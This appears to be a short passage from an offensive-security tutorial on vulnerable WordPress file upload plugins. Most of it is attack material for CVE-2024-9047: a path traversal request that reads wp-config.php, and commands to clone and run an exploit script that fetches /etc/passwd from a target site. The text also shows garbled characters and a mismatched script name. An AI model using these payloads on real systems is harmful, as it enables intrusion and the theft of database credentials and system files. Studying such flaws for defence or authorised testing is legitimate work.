Vulnerable File Upload Plugins
β‘ Key Vulnerable Plugins and Exploits
1. Revslider Plugin Example Exploit (We saw it in the last chapter).
2. WordPress File Upload β€ 4.24.11 β Unauthenticated Path Traversal (CVE 2024-9047)
GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=../../../../../../wp-config.php
git clone https://github.com/verylazytech/CVE-2024-9047
cd CVE-2024-9047
chmod +x cve-2024-9047
./cve-2024-9047.sh www.vulnerablewebsite.com /etc/passwd
π Why File Upload Vulnerabilities Matter
Last updated